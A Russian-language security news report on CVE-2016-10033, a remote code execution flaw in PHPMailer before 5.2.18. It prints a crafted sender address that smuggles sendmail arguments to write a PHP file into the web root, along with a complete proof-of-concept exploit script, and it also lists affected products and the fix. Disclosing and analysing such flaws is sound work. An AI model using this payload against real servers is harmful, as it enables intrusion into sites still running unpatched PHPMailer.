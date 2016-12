В PHPMailer, популярной библиотеке для организации отправки электронный писем из приложений на языке PHP, число пользователей которой оценивается в 9 миллионов, обнаружена критическая уязвимость (CVE-2016-10033), позволяющая инициировать удаленное выполнение кода без прохождения аутентификации. Проблема аналогична недавно найденной уязвимости в Roundcube Webmail и также связана с небезопасным использованием PHP-функции mail() совместно с утилитой sendmail в качестве транспорта по умолчанию. Отсутствие должной проверки параметра "Sender" (неверная интерпретация экранированных кавычек), позволяет организовать передачу утилите sendmail произвольных аргументов командной строки, в том числе можно переопределить директорию очереди и файл с логом, что позволяет организовать запись сообщения в произвольный файл в локальной ФС на сервере с правами под которыми запускается PHP-приложение. В частности, попытка отправки сообщения на email "Attacker \" -Param2 -Param3"@test.com приведёт к выполнению утилиты sendmail со следующими аргументами: Arg no. 0 == [/usr/sbin/sendmail] Arg no. 1 == [-t] Arg no. 2 == [-i] Arg no. 3 == [-fAttacker\] Arg no. 4 == [-Param2] Arg no. 5 == [-Param3"@test.com] Для записи кода в файл /var/www/cache/phpcode.php в качестве отправителя можно указать ' "attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php some"@email.com ', что демонстрирует следующий прототип эксплоита (опция "-X/var/www/cache/phpcode.php" приведёт к созданию лога /var/www/cache/phpcode.php в который будет записано тело сообщения): $email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php some"@email.com'; $msg_body = "{?php phpinfo(); ?}"; require_once('class.phpmailer.php'); $mail = new PHPMailer(); $mail->SetFrom($email_from, 'Client Name'); $address = "customer_feedback@company-X.com"; $mail->AddAddress($address, "Some User"); $mail->Subject = "PHPMailer PoC Exploit CVE-2016-10033"; $mail->MsgHTML($msg_body); if(!$mail->Send()) { echo "Mailer Error: " . $mail->ErrorInfo; } else { echo "Message sent!

"; } Проблема устранена в PHPMailer 5.2.18, все более ранние выпуски подвержены уязвимости. Дистрибутивы пока не выпустили обновления пакетов: Debian, RHEL/CentOS, Fedora, Ubuntu, SUSE, openSUSE. Проблема проявляется при использовании настроек по умолчанию: отключен safe_mode, а для отправки используется PHP-функция mail() и утилита sendmail. Уязвимость усугубляется тем, что PHPMailer применяется во многих популярных продуктах для Web, в том числе в WordPress, Drupal, Joomla, 1CRM, SugarCRM, Yii и сотнях других проектов. Атака может быть проведена через различные формы отправки отзывов, регистарции, связи с администрацией и других операций, приводящих к отправке сообщений по электронной почте при помощи PHPMailer. Уязвимы или нет конкретные системы зависит от того, насколько качественно в них реализованы дополнительные проверки email-адресов перед отправкой сообщений через PHPMailer и используются ли настройки PHPMailer по умолчанию. Дополнение: WordPress и Drupal (модули PHPMailer и SMTP) опубликовали предупреждение о проявлении уязвимости при использовании проблемной версии PHPMailer. Уязвимости присвоен наивысший (Highly Critical) уровень опасности.